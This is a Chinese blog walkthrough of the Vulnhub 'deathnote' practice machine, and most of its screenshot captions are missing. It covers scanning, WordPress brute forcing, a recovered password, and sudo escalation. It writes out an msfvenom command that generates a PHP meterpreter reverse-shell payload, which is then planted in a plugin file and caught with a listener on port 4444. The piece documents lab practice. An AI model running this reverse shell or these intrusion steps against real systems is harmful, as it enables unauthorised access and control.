kali扫描不到ip时:关于Vulnhub 靶机ip无法扫描到的解决方法_vulnhub靶机扫描不到ip_葫芦娃42的博客-CSDN博客
获得ip:
进行端口扫描:
只有80的http和22的ssh:
扫描http服务:
在下面看到:
需要域名解析,添加:vim /etc/hosts
访问:
可以猜测是一个wp的框架
尝试爆破一下路径:
爆破到登录的界面:
使用wp扫描一下用户名:
扫描到:
继续看一下网站存不存在密码的信息:
发现hint,点击查看:
看到一个评论,猜测是密码,进行登录:
登录成功
查看插件可不可以进行shell反弹:
生成一个反弹shell的脚本:(msfvenom -p php/meterpreter/reverse_tcp LHOST=yourip LPORT=yourport -f raw > shell.php)
访问该文件(http://deathnote.vuln/wordpress/wp-content/plugins/akismet/wrapper.php),并且本地监听4444:
监听成功:
开启shell:
看到存在两个用户,查看一下passwd的文件:
看到 l 和kira都具有很高的权限
查看一下l用户的东西:
是一个编码,进行解码:
i think u got the shell , but you wont be able to kill me -kira
看来关键还是kira
看一下kira有什么:
没有权限
查看一下L的文件
查看一下opt下的文件:
存在两个文件:
查看一下第一个:
查看一下hint:
提示需要使用cyberchef
查看一下case.wav
尝试解码:
16进制编写字符串:
cGFzc3dkIDoga2lyYWlzZXZpbCA=
base64解码:
passwd : kiraisevil 看来是密码:
尝试kira登录
登录成功:
查看权限:
具有sudo权限:
开启shell:
没有??
使用ssh进行连接:
成功登录,查看sudo权限
竟然是全部,那就修改一个密码吧:
然后登录:
成功登录(只要是可以sudo提权的都可以使用)
都可以
查看文件:
完成!!!